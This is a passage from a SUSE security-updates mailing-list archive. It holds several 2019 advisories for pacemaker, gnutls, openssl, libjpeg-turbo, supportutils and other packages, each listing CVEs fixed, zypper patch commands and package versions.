https://bugzilla.suse.com/1127223 https://bugzilla.suse.com/1127308 https://bugzilla.suse.com/1128574 https://bugzilla.suse.com/1131994 From sle-security-updates at lists.suse.com Tue Apr 30 10:10:26 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 18:10:26 +0200 (CEST) Subject: SUSE-SU-2019:1108-1: important: Security update for pacemaker Message-ID: <20190430161026.6A030F3D3@maintenance.suse.de> SUSE Security Update: Security update for pacemaker ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1108-1 Rating: important References: #1131353 #1131356 Cross-References: CVE-2018-16877 CVE-2018-16878 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise High Availability 12-SP3 
______________________________________________________________________________ An update that fixes two vulnerabilities is now available. Description: This update for pacemaker fixes the following issues: Security issues fixed: - CVE-2018-16877: Fixed a local privilege escalation through insufficient IPC client-server authentication. (bsc#1131356) - CVE-2018-16878: Fixed a denial of service through insufficient verification inflicted preference of uncontrolled processes. (bsc#1131353) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1108=1 - SUSE Linux Enterprise High Availability 12-SP3: zypper in -t patch SUSE-SLE-HA-12-SP3-2019-1108=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): libpacemaker-devel-1.1.16-6.14.1 pacemaker-cts-1.1.16-6.14.1 pacemaker-cts-debuginfo-1.1.16-6.14.1 pacemaker-debuginfo-1.1.16-6.14.1 pacemaker-debugsource-1.1.16-6.14.1 - SUSE Linux Enterprise High Availability 12-SP3 (ppc64le s390x x86_64): libpacemaker3-1.1.16-6.14.1 libpacemaker3-debuginfo-1.1.16-6.14.1 pacemaker-1.1.16-6.14.1 pacemaker-cli-1.1.16-6.14.1 pacemaker-cli-debuginfo-1.1.16-6.14.1 pacemaker-cts-1.1.16-6.14.1 pacemaker-cts-debuginfo-1.1.16-6.14.1 pacemaker-debuginfo-1.1.16-6.14.1 pacemaker-debugsource-1.1.16-6.14.1 pacemaker-remote-1.1.16-6.14.1 pacemaker-remote-debuginfo-1.1.16-6.14.1 References: https://www.suse.com/security/cve/CVE-2018-16877.html https://www.suse.com/security/cve/CVE-2018-16878.html https://bugzilla.suse.com/1131353 https://bugzilla.suse.com/1131356 From sle-security-updates at lists.suse.com Tue Apr 30 13:09:50 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 21:09:50 +0200 
(CEST) Subject: SUSE-SU-2019:1110-1: moderate: Security update for ovmf Message-ID: <20190430190950.E3586F3D3@maintenance.suse.de> SUSE Security Update: Security update for ovmf ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1110-1 Rating: moderate References: #1131361 Cross-References: CVE-2019-0161 Affected Products: SUSE Linux Enterprise Module for Server Applications 15 ______________________________________________________________________________ An update that fixes one vulnerability is now available. Description: This update for ovmf fixes the following issues: Security issue fixed: - CVE-2019-0161: Fixed a stack overflow in UsbBusDxe and UsbBusPei, which could potentially be triggered by a local unauthenticated user (bsc#1131361). Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Server Applications 15: zypper in -t patch SUSE-SLE-Module-Server-Applications-15-2019-1110=1 Package List: - SUSE Linux Enterprise Module for Server Applications 15 (aarch64 x86_64): ovmf-2017+git1510945757.b2662641d5-5.22.1 ovmf-tools-2017+git1510945757.b2662641d5-5.22.1 - SUSE Linux Enterprise Module for Server Applications 15 (noarch): qemu-ovmf-x86_64-2017+git1510945757.b2662641d5-5.22.1 qemu-uefi-aarch64-2017+git1510945757.b2662641d5-5.22.1 References: https://www.suse.com/security/cve/CVE-2019-0161.html https://bugzilla.suse.com/1131361 From sle-security-updates at lists.suse.com Tue Apr 30 13:11:11 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 21:11:11 +0200 (CEST) Subject: SUSE-SU-2019:1121-1: important: Security update for gnutls Message-ID: <20190430191111.28865F3D3@maintenance.suse.de> SUSE Security Update: Security update for gnutls 
______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1121-1 Rating: important References: #1118087 #1130681 #1130682 Cross-References: CVE-2018-16868 CVE-2019-3829 CVE-2019-3836 Affected Products: SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Desktop Applications 15 SUSE Linux Enterprise Module for Basesystem 15 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for gnutls fixes to version 3.6.7 the following issues: Security issued fixed: - CVE-2019-3836: Fixed an invalid pointer access via malformed TLS1.3 async messages (bsc#1130682). - CVE-2019-3829: Fixed a double free vulnerability in the certificate verification API (bsc#1130681). - CVE-2018-16868: Fixed Bleichenbacher-like side channel leakage in PKCS#1 v1.5 verification and padding oracle verification (bsc#1118087) Non-security issue fixed: - Update gnutls to support TLS 1.3 (fate#327114) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". 
Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1121=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-1121=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-1121=1 Package List: - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): gnutls-debuginfo-3.6.7-6.8.1 gnutls-debugsource-3.6.7-6.8.1 gnutls-guile-3.6.7-6.8.1 gnutls-guile-debuginfo-3.6.7-6.8.1 - SUSE Linux Enterprise Module for Desktop Applications 15 (x86_64): gnutls-debugsource-3.6.7-6.8.1 libgnutls30-32bit-3.6.7-6.8.1 libgnutls30-32bit-debuginfo-3.6.7-6.8.1 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): gnutls-3.6.7-6.8.1 gnutls-debuginfo-3.6.7-6.8.1 gnutls-debugsource-3.6.7-6.8.1 libgnutls-devel-3.6.7-6.8.1 libgnutls30-3.6.7-6.8.1 libgnutls30-debuginfo-3.6.7-6.8.1 libgnutlsxx-devel-3.6.7-6.8.1 libgnutlsxx28-3.6.7-6.8.1 libgnutlsxx28-debuginfo-3.6.7-6.8.1 - SUSE Linux Enterprise Module for Basesystem 15 (x86_64): libgnutls30-32bit-3.6.7-6.8.1 libgnutls30-32bit-debuginfo-3.6.7-6.8.1 References: https://www.suse.com/security/cve/CVE-2018-16868.html https://www.suse.com/security/cve/CVE-2019-3829.html https://www.suse.com/security/cve/CVE-2019-3836.html https://bugzilla.suse.com/1118087 https://bugzilla.suse.com/1130681 https://bugzilla.suse.com/1130682 From sle-security-updates at lists.suse.com Tue Apr 30 13:12:52 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 21:12:52 +0200 (CEST) Subject: SUSE-SU-2019:1111-1: moderate: Security update for libjpeg-turbo Message-ID: <20190430191252.09FA7F3D3@maintenance.suse.de> SUSE Security Update: Security update for libjpeg-turbo 
______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1111-1 Rating: moderate References: #1096209 #1098155 #1128712 Cross-References: CVE-2018-1152 CVE-2018-11813 CVE-2018-14498 Affected Products: SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 ______________________________________________________________________________ An update that fixes three vulnerabilities is now available. Description: This update for libjpeg-turbo fixes the following issues: The following security vulnerabilities were addressed: - CVE-2018-14498: Fixed a heap-based buffer over read in get_8bit_row function which could allow to an attacker to cause denial of service (bsc#1128712). - CVE-2018-11813: Fixed the end-of-file mishandling in read_pixel in rdtarga.c, which allowed remote attackers to cause a denial-of-service via crafted JPG files due to a large loop (bsc#1096209) - CVE-2018-1152: Fixed a denial of service in start_input_bmp() rdbmp.c caused by a divide by zero when processing a crafted BMP image (bsc#1098155) Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". 
Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1111=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1111=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1111=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1111=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1111=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1111=1 Package List: - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): libjpeg62-devel-62.2.0-31.14.2 libjpeg8-devel-8.1.2-31.14.2 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): libjpeg62-devel-62.2.0-31.14.2 libjpeg8-devel-8.1.2-31.14.2 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): libjpeg-turbo-1.5.3-31.14.2 libjpeg-turbo-debuginfo-1.5.3-31.14.2 libjpeg-turbo-debugsource-1.5.3-31.14.2 libjpeg62-62.2.0-31.14.2 libjpeg62-debuginfo-62.2.0-31.14.2 libjpeg62-turbo-1.5.3-31.14.2 libjpeg62-turbo-debugsource-1.5.3-31.14.2 libjpeg8-8.1.2-31.14.2 libjpeg8-debuginfo-8.1.2-31.14.2 libturbojpeg0-8.1.2-31.14.2 libturbojpeg0-debuginfo-8.1.2-31.14.2 - SUSE Linux Enterprise Server 12-SP4 (s390x x86_64): libjpeg62-32bit-62.2.0-31.14.2 libjpeg62-debuginfo-32bit-62.2.0-31.14.2 libjpeg8-32bit-8.1.2-31.14.2 libjpeg8-debuginfo-32bit-8.1.2-31.14.2 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): libjpeg-turbo-1.5.3-31.14.2 libjpeg-turbo-debuginfo-1.5.3-31.14.2 libjpeg-turbo-debugsource-1.5.3-31.14.2 libjpeg62-62.2.0-31.14.2 libjpeg62-debuginfo-62.2.0-31.14.2 libjpeg62-turbo-1.5.3-31.14.2 libjpeg62-turbo-debugsource-1.5.3-31.14.2 libjpeg8-8.1.2-31.14.2 libjpeg8-debuginfo-8.1.2-31.14.2 libturbojpeg0-8.1.2-31.14.2 
libturbojpeg0-debuginfo-8.1.2-31.14.2 - SUSE Linux Enterprise Server 12-SP3 (s390x x86_64): libjpeg62-32bit-62.2.0-31.14.2 libjpeg62-debuginfo-32bit-62.2.0-31.14.2 libjpeg8-32bit-8.1.2-31.14.2 libjpeg8-debuginfo-32bit-8.1.2-31.14.2 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): libjpeg-turbo-1.5.3-31.14.2 libjpeg-turbo-debuginfo-1.5.3-31.14.2 libjpeg-turbo-debugsource-1.5.3-31.14.2 libjpeg62-32bit-62.2.0-31.14.2 libjpeg62-62.2.0-31.14.2 libjpeg62-debuginfo-32bit-62.2.0-31.14.2 libjpeg62-debuginfo-62.2.0-31.14.2 libjpeg62-turbo-1.5.3-31.14.2 libjpeg62-turbo-debugsource-1.5.3-31.14.2 libjpeg8-32bit-8.1.2-31.14.2 libjpeg8-8.1.2-31.14.2 libjpeg8-debuginfo-32bit-8.1.2-31.14.2 libjpeg8-debuginfo-8.1.2-31.14.2 libturbojpeg0-8.1.2-31.14.2 libturbojpeg0-debuginfo-8.1.2-31.14.2 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): libjpeg-turbo-1.5.3-31.14.2 libjpeg-turbo-debuginfo-1.5.3-31.14.2 libjpeg-turbo-debugsource-1.5.3-31.14.2 libjpeg62-32bit-62.2.0-31.14.2 libjpeg62-62.2.0-31.14.2 libjpeg62-debuginfo-32bit-62.2.0-31.14.2 libjpeg62-debuginfo-62.2.0-31.14.2 libjpeg62-turbo-1.5.3-31.14.2 libjpeg62-turbo-debugsource-1.5.3-31.14.2 libjpeg8-32bit-8.1.2-31.14.2 libjpeg8-8.1.2-31.14.2 libjpeg8-debuginfo-32bit-8.1.2-31.14.2 libjpeg8-debuginfo-8.1.2-31.14.2 libturbojpeg0-8.1.2-31.14.2 libturbojpeg0-debuginfo-8.1.2-31.14.2 References: https://www.suse.com/security/cve/CVE-2018-1152.html https://www.suse.com/security/cve/CVE-2018-11813.html https://www.suse.com/security/cve/CVE-2018-14498.html https://bugzilla.suse.com/1096209 https://bugzilla.suse.com/1098155 https://bugzilla.suse.com/1128712 From sle-security-updates at lists.suse.com Tue Apr 30 13:15:51 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Tue, 30 Apr 2019 21:15:51 +0200 (CEST) Subject: SUSE-SU-2019:1124-1: moderate: Security update for openssl Message-ID: <20190430191551.EAE8CF3D3@maintenance.suse.de> SUSE Security Update: Security update for openssl 
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:1124-1
Rating: moderate
References: #1117951 #1131291
Affected Products:
  SUSE Linux Enterprise Server for SAP 12-SP1
  SUSE Linux Enterprise Server 12-SP1-LTSS
______________________________________________________________________________

An update that contains security fixes can now be installed.

Description:

This update for openssl fixes the following issues:

Security issues fixed:

- Mitigation for cache side channel attacks: The 9 Lives of Bleichenbacher's CAT (bsc#1117951)
- Reject invalid elliptic curve point coordinates (bsc#1131291)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Server for SAP 12-SP1:

  zypper in -t patch SUSE-SLE-SAP-12-SP1-2019-1124=1

- SUSE Linux Enterprise Server 12-SP1-LTSS:

  zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1124=1

Package List:

- SUSE Linux Enterprise Server for SAP 12-SP1 (x86_64):

  libopenssl1_0_0-1.0.1i-54.23.1
  libopenssl1_0_0-32bit-1.0.1i-54.23.1
  libopenssl1_0_0-debuginfo-1.0.1i-54.23.1
  libopenssl1_0_0-debuginfo-32bit-1.0.1i-54.23.1
  libopenssl1_0_0-hmac-1.0.1i-54.23.1
  libopenssl1_0_0-hmac-32bit-1.0.1i-54.23.1
  openssl-1.0.1i-54.23.1
  openssl-debuginfo-1.0.1i-54.23.1
  openssl-debugsource-1.0.1i-54.23.1

- SUSE Linux Enterprise Server for SAP 12-SP1 (noarch):

  openssl-doc-1.0.1i-54.23.1

- SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64):

  libopenssl1_0_0-1.0.1i-54.23.1
  libopenssl1_0_0-debuginfo-1.0.1i-54.23.1
  libopenssl1_0_0-hmac-1.0.1i-54.23.1
  openssl-1.0.1i-54.23.1
  openssl-debuginfo-1.0.1i-54.23.1
  openssl-debugsource-1.0.1i-54.23.1

- SUSE Linux Enterprise Server 12-SP1-LTSS (s390x x86_64):

  libopenssl1_0_0-32bit-1.0.1i-54.23.1
  libopenssl1_0_0-debuginfo-32bit-1.0.1i-54.23.1
  libopenssl1_0_0-hmac-32bit-1.0.1i-54.23.1

- SUSE Linux Enterprise Server 12-SP1-LTSS (noarch):

  openssl-doc-1.0.1i-54.23.1

References:

https://bugzilla.suse.com/1117951
https://bugzilla.suse.com/1131291

From sle-security-updates at lists.suse.com Tue Apr 30 13:16:38 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 30 Apr 2019 21:16:38 +0200 (CEST)
Subject: SUSE-SU-2019:1122-1: important: Security update for hostinfo, supportutils
Message-ID: <20190430191638.9B815F3D3@maintenance.suse.de>

SUSE Security Update: Security update for hostinfo, supportutils
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:1122-1
Rating: important
References: #1054979 #1099498 #1115245 #1117751 #1117776 #1118460 #1118462 #1118463 #1125623 #1125666
Cross-References: CVE-2018-19636 CVE-2018-19637 CVE-2018-19638 CVE-2018-19639 CVE-2018-19640
Affected Products:
  SUSE OpenStack Cloud 7
  SUSE Linux Enterprise Server for SAP 12-SP2
  SUSE Linux Enterprise Server 12-SP4
  SUSE Linux Enterprise Server 12-SP3
  SUSE Linux Enterprise Server 12-SP2-LTSS
  SUSE Linux Enterprise Server 12-SP2-BCL
  SUSE Linux Enterprise Server 12-SP1-LTSS
  SUSE Linux Enterprise Server 12-LTSS
  SUSE Linux Enterprise Desktop 12-SP4
  SUSE Linux Enterprise Desktop 12-SP3
  SUSE Enterprise Storage 4
  SUSE CaaS Platform ALL
______________________________________________________________________________

An update that solves 5 vulnerabilities and has 5 fixes is now available.

Description:

This update for hostinfo, supportutils fixes the following issues:

Security issues fixed for supportutils:

- CVE-2018-19640: Fixed an issue where users could kill arbitrary processes (bsc#1118463).
- CVE-2018-19638: Fixed an issue where users could overwrite arbitrary log files (bsc#1118460).
- CVE-2018-19639: Fixed a code execution if run with -v (bsc#1118462).
- CVE-2018-19637: Fixed an issue where a static temporary filename could allow overwriting of files (bsc#1117776).
- CVE-2018-19636: Fixed a local root exploit via inclusion of attacker controlled shell script (bsc#1117751).

Other issues fixed for supportutils:

- Fixed invalid exit code commands (bsc#1125666)
- SUSE separation in supportconfig (bsc#1125623)
- Clarified supportconfig(8) -x option (bsc#1115245)
- supportconfig: 3.0.127
- btrfs filesystem usage
- List products.d
- Dump lsof errors
- Added ha commands for corosync
- Dumped find errors in ib_info

Issues fixed in hostinfo:

- Removed extra kernel install dates (bsc#1099498)
- Resolved network bond issue (bsc#1054979)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE OpenStack Cloud 7:

  zypper in -t patch SUSE-OpenStack-Cloud-7-2019-1122=1

- SUSE Linux Enterprise Server for SAP 12-SP2:

  zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-1122=1

- SUSE Linux Enterprise Server 12-SP4:

  zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1122=1

- SUSE Linux Enterprise Server 12-SP3:

  zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1122=1

- SUSE Linux Enterprise Server 12-SP2-LTSS:

  zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-1122=1

- SUSE Linux Enterprise Server 12-SP2-BCL:

  zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-1122=1

- SUSE Linux Enterprise Server 12-SP1-LTSS:

  zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1122=1

- SUSE Linux Enterprise Server 12-LTSS:

  zypper in -t patch SUSE-SLE-SERVER-12-2019-1122=1

- SUSE Linux Enterprise Desktop 12-SP4:

  zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1122=1

- SUSE Linux Enterprise Desktop 12-SP3:

  zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1122=1

- SUSE Enterprise Storage 4:

  zypper in -t patch SUSE-Storage-4-2019-1122=1

- SUSE CaaS Platform ALL:

  To install this update, use the SUSE CaaS Platform Velum dashboard.
  It will inform you if it detects new updates and let you then trigger updating of the complete cluster in a controlled way.

Package List:

- SUSE OpenStack Cloud 7 (noarch):

  hostinfo-1.0.1-19.5.1
  supportutils-3.0-95.21.1

- SUSE Linux Enterprise Server for SAP 12-SP2 (noarch):

  hostinfo-1.0.1-19.5.1
  supportutils-3.0-95.21.1

- SUSE Linux Enterprise Server 12-SP4 (noarch):

  hostinfo-1.0.1-19.5.1
  supportutils-3.0-95.21.1

- SUSE Linux Enterprise Server 12-SP3 (noarch):

  hostinfo-1.0.1-19.5.1
  supportutils-3.0-95.21.1

- SUSE Linux Enterprise Server 12-SP2-LTSS (noarch):

  hostinfo-1.0.1-19.5.1
  supportutils-3.0-95.21.1

- SUSE Linux Enterprise Server 12-SP2-BCL (noarch):

  hostinfo-1.0.1-19.5.1
  supportutils-3.0-95.21.1

- SUSE Linux Enterprise Server 12-SP1-LTSS (noarch):

  hostinfo-1.0.1-19.5.1
  supportutils-3.0-95.21.1

- SUSE Linux Enterprise Server 12-LTSS (noarch):

  hostinfo-1.0.1-19.5.1
  supportutils-3.0-95.21.1

- SUSE Linux Enterprise Desktop 12-SP4 (noarch):

  supportutils-3.0-95.21.1

- SUSE Linux Enterprise Desktop 12-SP3 (noarch):

  supportutils-3.0-95.21.1

- SUSE Enterprise Storage 4 (noarch):

  hostinfo-1.0.1-19.5.1
  supportutils-3.0-95.21.1

- SUSE CaaS Platform ALL (noarch):

  supportutils-3.0-95.21.1

References:

https://www.suse.com/security/cve/CVE-2018-19636.html
https://www.suse.com/security/cve/CVE-2018-19637.html
https://www.suse.com/security/cve/CVE-2018-19638.html
https://www.suse.com/security/cve/CVE-2018-19639.html
https://www.suse.com/security/cve/CVE-2018-19640.html
https://bugzilla.suse.com/1054979
https://bugzilla.suse.com/1099498
https://bugzilla.suse.com/1115245
https://bugzilla.suse.com/1117751
https://bugzilla.suse.com/1117776
https://bugzilla.suse.com/1118460
https://bugzilla.suse.com/1118462
https://bugzilla.suse.com/1118463
https://bugzilla.suse.com/1125623
https://bugzilla.suse.com/1125666

From sle-security-updates at lists.suse.com Tue Apr 30 13:18:31 2019
From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com)
Date: Tue, 30 Apr 2019 21:18:31 +0200 (CEST)
Subject: SUSE-SU-2019:1123-1: Security update for yubico-piv-tool
Message-ID: <20190430191831.30583F3DA@maintenance.suse.de>

SUSE Security Update: Security update for yubico-piv-tool
______________________________________________________________________________

Announcement ID: SUSE-SU-2019:1123-1
Rating: low
References: #1104809 #1104811
Cross-References: CVE-2018-14779 CVE-2018-14780
Affected Products:
  SUSE Linux Enterprise Module for Basesystem 15
______________________________________________________________________________

An update that fixes two vulnerabilities is now available.

Description:

This update for yubico-piv-tool fixes the following issues:

Security issues fixed:

- Fixed a buffer overflow and an out-of-bounds memory read in ykpiv_transfer_data(), which could be triggered by a malicious token. (CVE-2018-14779, bsc#1104809, YSA-2018-03)
- Fixed a buffer overflow and an out-of-bounds memory read in _ykpiv_fetch_object(), which could be triggered by a malicious token. (CVE-2018-14780, bsc#1104811, YSA-2018-03)

Patch Instructions:

To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch".

Alternatively you can run the command listed for your product:

- SUSE Linux Enterprise Module for Basesystem 15:

  zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-1123=1

Package List:

- SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64):

  libykcs11-1-1.5.0-3.3.33
  libykcs11-1-debuginfo-1.5.0-3.3.33
  libykcs11-devel-1.5.0-3.3.33
  libykpiv-devel-1.5.0-3.3.33
  libykpiv1-1.5.0-3.3.33
  libykpiv1-debuginfo-1.5.0-3.3.33
  yubico-piv-tool-1.5.0-3.3.33
  yubico-piv-tool-debuginfo-1.5.0-3.3.33
  yubico-piv-tool-debugsource-1.5.0-3.3.33

References:

https://www.suse.com/security/cve/CVE-2018-14779.html
https://www.suse.com/security/cve/CVE-2018-14780.html
https://bugzilla.suse.com/1104809
https://bugzilla.suse.com/1104811